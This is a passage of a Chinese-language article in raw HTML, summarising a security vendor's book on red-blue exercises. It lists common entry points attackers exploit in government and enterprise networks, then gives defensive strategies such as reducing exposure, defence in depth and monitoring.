style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.3 互联网应用系统常规漏洞过多</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">在历年的实战攻防演练期间，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">已知应用系统漏洞、中间件漏洞以及因配置问题产生的常规漏洞</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，是攻击方发现的明显问题和主要攻击渠道。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">通过中间件来看，Weblogic、Websphere、Tomcat、Apache、Nginx、IIS都有使用。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">Weblogic应用比较广泛，因存在反序列化漏洞，所以常常会被作为打点和内网渗透的突破点。所有行业基本上都有对外开放的邮件系统，可以针对邮件系统漏洞，譬如跨站漏洞、CoreMail漏洞、XXE漏洞来针对性开展攻击，也可以通过钓鱼邮件和鱼叉邮件攻击来开展社工工作，均是比较好的突破点。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.4 互联网敏感信息泄漏明显</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">网络拓扑、用户信息、登录凭证等敏感信息在互联网大量泄漏 , 成为攻击方突破点。</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">针对暗网的调查发现，与政企机构网络登录凭证等相关信息的交易正在蓬勃发展。</span></strong></span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">2019 年第四季度，暗网市场网络凭证数据的交易数量开始有所上升，出售的数量就相当于 2018 年全年的总和。2020 年第一季度，暗网市场销售的网络登录的帖子数量比上一季度猛增了 69%。暗网出售的网络登录凭据涉及政府机构、医疗机构以及其他社会组织。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">实际上，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">2020 年是有记录以来数据泄漏最糟糕的一年。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">根据Canalys的最新报告“网络安全的下一步”， 2020年短短12个月内泄漏的记录比过去15年的总和还多。大量互联网敏感数据泄漏，为攻击者进入内部网络和开展攻击提供了便利。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.5 边界设备成为进入内网的缺口</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">互联网出口和应用都是攻入内部网络的入口和途径。</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">目前政企机构的接入防护措施良莠不齐，给蓝队创造了大量的机会。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">针对 VPN 系统等开放于互联网边界的设备或系统，为了避免影响到员工使用，很多政企机构都没有在其传输通道上增加更多的防护手段；再加上此类系统多会集成统一登录，一旦获得了某个员工的账号密码，蓝队可以通过这些系统突破边界直接进入内部网络中来。 </span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">此外，防火墙作为重要的网络层访问控制设备，随着网络架构与业务的增长与变化，安全策略非常容易混乱，甚至一些政企机构为了解决可用性问题，出现了“any to any”的策略。防守单位很难在短时间内梳理和配置几十个应用、上千个端口的精细化访问控制策略。缺乏访问控制策略的防火墙，就如同敞开的大门，安全域边界防护形同虚设。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.6 内网管理设备成为扩大战果突破点</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">主机承载着政企机构关键业务应用，需重点关注、重点防护。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">但很多机构的内部网络的防御机制脆弱，在实战攻防演练期间，经常发现早已披露的陈年漏洞未修复，特别是内部网络主机、服务器以及相关应用服务补丁修复不及时，成为蓝队利用的重要途径，从而顺利 拿下内部网络服务器及数据库权限。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">集权类系统成为攻击的主要目标。在攻防演练过程中，云管理平台、核心网络设备、堡垒机、SOC 平台、VPN 等集权系统，由于缺乏定期的维护升级，已经成为扩大权限的突破点。集权类系统一旦被突破，整个内部的应用和系统基本全部突破，可以实现以点打面，掌握对其所属管辖范围内的所有主机控制权。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.7 安全设备自身安全成为新的风险点</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">安全设备作为政企机构对抗攻击者的重要工具，其安全性应该相对较高。</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">但实际上安全产品自身也无法避免 0Day 攻击，安全设备自身安全成为新的风险点。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">每年攻防演练都会爆出某某安全设备自身存在某某漏洞被利用、被控制，反映出安全设备厂商自身安全开发和检测能力没有做到位，给蓝队留下了“后门”，形成新的风险点。</span></span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">2020 年实战攻防演练中的一大特点是，安全产品的漏洞挖掘和利用现象非常普遍，多家企业的多款安全产品被挖掘出新漏洞（0day 漏洞）或存在高危漏洞。 </span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">历年攻防实战演练中，被发现和利用的各类安全产品 0Day 漏洞，主要涉及安全网关、身份与访问管理、安全管理、终端安全等类型安全产品。这些安全产品的漏洞一旦被利用，可以使蓝队突破网络边界，获取控制权限进入网络；获取用户账户信息，并快速拿下相关设备和网络的控制权限。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">近两三年，出现了多起VPN、堡垒机、终端管理等重要安全设备被蓝队利用重大漏洞突破的案例，这些安全设备被攻陷，直接造成网络边界防护失效、大量管理权限被控制。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.8 供应链攻击成为攻击方的重要突破口</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">在攻防演练过程中，随着防守方对攻击行为的监测、发现和溯源能力大幅增强，攻击队开始更多地转向供应链攻击等新型作战策略。蓝队会从IT（设备及软件）服务商、安全服务商、办公及生产服务商等供应链机构入手，寻找软件、设备及系统漏洞，发现人员及管理薄弱点并实施攻击。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">常见的系统突破口包括：邮件系统、OA系统、安全设备、社交软件等；常见的突破方式包括软件漏洞，管理员弱口令等。</span></strong></span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">由于攻击对象范围广、攻击方式隐蔽，供应链攻成为攻击方的重要突破口，给政企安全防护带来了极大的挑战。从奇安信在 2021 年承接的实战攻防演练情况来看，由于供应链管控弱，软件外包、外部服务提供商等成为迂回攻击的重要通道。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.9 员工安全意识淡薄是攻击的突破口</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">利用人员安全意识不足或安全能力不足，实施社会工程学攻击，通过钓鱼邮件或社交平台进行诱骗，是攻击方经常使用的手法。 </span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">钓鱼邮件是最经常被使用的攻击手法之一。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">即便是安全意识较强的 IT 人员或管理员，也很容易被诱骗点开邮件中钓鱼链接或木马附件，进而导致关键终端被控，甚至整个网络沦陷。在历年攻防演练过程中，攻击队通过邮件钓鱼等方式攻击 IT 运维人员办公用机并获取数据及内网权限的案例数不胜数。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.10 内网安全检测能力不足</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">攻防演练中, 攻击方攻击测试，对防守方的检测能力要求更高。网络安全监控设备的部署、网络安全态势感知平台的建设，是实现安全可视化、安全可控的基础。部分企业采购部署了相关工具，但是每秒上千条报警，很难从中甄别出实际攻击事件。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">此外，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">部分老旧的防护设备，策略配置混乱，安全防护依靠这些系统发挥中坚力量，势必力不从心。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">流量监测及主机监控工具缺失，仅依靠传统防护设备的告警去判断攻击、甚至依靠人工去翻阅海量的日志，导致“巧妇难为无米之炊”。</span></span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">更重要的是，精于内部网络隐蔽渗透的攻击方，在内部网络进行非常谨慎而隐蔽的横向移动，很难被流量监测设备或态势感知系统检测。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.66640625" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=5cee0b12&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FLSOjyib5giaVcw6TTXicGmxyq5kYeZBvLibaCU7mwONOvQPdX1UaqQje5AiaSpyrwOdeQpac1MnlTImpdFNh88TbQIQ%2F640%3Fwx_fmt%3Djpeg"/></p><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="color: rgb(0, 122, 170);font-size: 18px;">03 保障数据不被泄漏的8个常用策略</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">企业内部的数据泄漏，究其原因，总结起来大致就以上这10种。对于企业或机构（红队：防守方）而言，如何做好防守以保证自己的数据不被泄漏呢，奇安信的这本《红蓝攻防》里也给出了8个常用策略。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.1 信息清理：互联网敏感信息</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">攻击队会采用社工、工具等多种技术手段，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">对目标单位可能暴露在互联网上的敏感信息进行搜集，为后期攻击做充分准备。</span></strong></span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">防守队除了定期对全员进行安全意识培训，不准将带有敏感信息的文件上传至公共信息平台外，针对漏网之鱼还可以通过定期开展敏感信息泄漏搜集服务，能够及时发现在互联网上已暴露的本单位敏感信息，提前采取应对措施，降低本单位敏感信息暴露的风险，增加攻击队搜集敏感信息的时间成本，为后续攻击抬高难度。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.2 收缩战线：缩小攻击暴露面</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">攻击队首先会通过各种渠道收集目标单位的各种信息，收集的情报越详细，攻击则会越隐蔽，越快速。此外，攻击队往往不会正面攻击防护较好的系统，而是找一些可能连防守者自己都不知道的薄弱环节下手。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">这就要求防守者一定要充分了解自己暴露在互联网的系统、端口、后台管理系统、与外单位互联的网络路径等信息。哪方面考虑不到位、哪方面往往就是被攻陷的点。互联网暴露面越多，越容易被攻击队“声东击西”，最终导致防守者顾此失彼，眼看着被攻击却无能为力。结合多年的防守经验，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">可从如下几方面收敛互联网暴露面。</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">攻击路径梳理</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">互联网攻击面收敛</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">外部接入网络梳理</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">隐蔽入口梳理</span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.3 纵深防御：立体防渗透</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">收缩战线工作完成后，针对实战攻击，防守队应对自身安全状态开展全面体检，此时可结合战争中的纵深防御理论来审视当前网络安全防护能力。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;caret-color: red;letter-spacing: normal;">从互联网端防护、内外部访问控制（安全域间甚至每台机器之间）、主机层防护、供应链安全甚至物理层近源攻击的防护，都需要考虑进去。通过层层防护，尽量拖慢攻击队扩大战果的时间，将损失降至最小。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">资产动态梳理</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">互联网端防护</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">访问策略梳理</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">主机加固防护</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">供应链安全</span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.4 守护核心：找到关键点</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">正式防守工作中，根据系统的重要性划分出防守工作重点，找到关键点，集中力量进行防守。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">根据实战攻防经验，核心关键点一般包括：靶标系统、集权类系统、具有重要数据的业务系统等</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">，在防守前应针对这些重点系统再次进行梳理和整改，梳理得越细越好。必要情况下对这些系统进行单独的评估，充分检验重点核心系统的安全性。同时在正式防守工作，对重点系统的流量、日志进行实时监控和分析。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">靶标系统</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">集权系统</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">重要业务系统</span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.5 协同作战：体系化支撑</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">面对大规模有组织的攻击时，攻击手段会不断快速变化升级，防守队在现场人员能力无法应对攻击的情况下，还应该借助后端技术资源，相互配合协同作战，建立体系化支撑，才能有效应对防守工作中面临的各种挑战。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">产品应急支撑</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">安全事件应急支撑</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">情报支撑</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">样本数据分析支撑</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">追踪溯源支撑</span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.6 主动防御：全方位监控</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">近两年的红蓝对抗，攻击队的手段越来越隐蔽，越来越单刀直入，通过0day、Nday直指系统漏洞，直接获得系统控制权限。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">红队需拥有完整的系统隔离手段，蓝队成功攻击到内网之后，会对内网进行横向渗透。</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">所以系统与系统之间的隔离，就显得尤为重要。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">红队必须清楚哪些系统之间有关联、访问控制措施是什么。在发生攻击事件后，应当立即评估受害系统范围和关联的其他系统，并及时做出应对的访问控制策略，防止内部持续的横向渗透。</span></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">任何攻击都会留下痕迹。攻击队会尽量隐藏痕迹、防止被发现。而防守者恰好相反，需要尽早发现攻击痕迹，并通过分析攻击痕迹，调整防守策略、溯源攻击路径、甚至对可疑攻击源进行反制。建立全方位的安全监控体系是防守者最有力的武器，总结多年实战经验，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">有效的安全监控体系需在如下几方面开展：</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">自动化的IP封禁</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: 